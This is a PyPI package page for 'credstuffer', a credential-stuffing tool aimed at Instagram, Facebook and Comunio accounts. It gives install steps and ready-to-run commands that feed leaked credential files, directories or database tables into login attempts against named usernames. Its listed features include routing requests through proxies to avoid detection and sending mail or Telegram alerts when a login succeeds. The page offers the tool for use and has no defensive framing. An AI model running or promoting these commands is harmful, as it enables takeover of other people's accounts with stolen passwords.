Skip to main content

credentials stuffer

Project description

credstuffer

Build Status License: MIT

Features of credstuffer:

  • Stuffing social media accounts like comunio, instagram, facebook
  • Provide easily credentials from directories, files or from a database connection
  • Get Mail or Telegram notifications in success case
  • Login requests are only made over proxies

Installation

install credstuffer with pip


pip3 install credstuffer

or from source


sudo python3 setup.py install

Usage and Examples

Print the available arguments for credstuffer


credstuffer --help

Use it with a credential file of your choice


credstuffer instagram --usernames "John, Jane" file --path /home/john/credentials.txt

Provide a directory including multiple credential files


credstuffer instagram --usernames "John, Jane" file --dir /home/john/credential_collection/

Or fetch credential data from a database connection


credstuffer instagram --usernames "John, Jane" database --host 192.168.1.2 --port 5432 --user john --password test1234 --dbname postgres --schemas a --tables abc

Pass Mail Server params to get a notification in success case


credstuffer instagram --usernames "John, Jane" --Nsmtp smtp.web.de --Nport 587 --Nsender sender@web.de --Nreceiver receiver@web.de --Npassword password file --dir /home/john/credential_collection/

Logs

logs can be found in /var/log/credstuffer

Troubleshooting

add your current user to group syslog, this allows the application/scripts to create a folder in /var/log. Replace <user> with your current user


sudo adduser <user> syslog

to apply this change, log out and log in again and check with the terminal command groups

Changelog

All changes and versioning information can be found in the CHANGELOG

License

Copyright (c) 2019 Bierschneider Christian. See LICENSE for details

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

credstuffer-1.0.13.tar.gz (24.2 kB view hashes)

Uploaded Source

Built Distributions

credstuffer-1.0.13-py3.6.egg (90.3 kB view hashes)

Uploaded Source

credstuffer-1.0.13-py3-none-any.whl (37.7 kB view hashes)

Uploaded Python 3

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page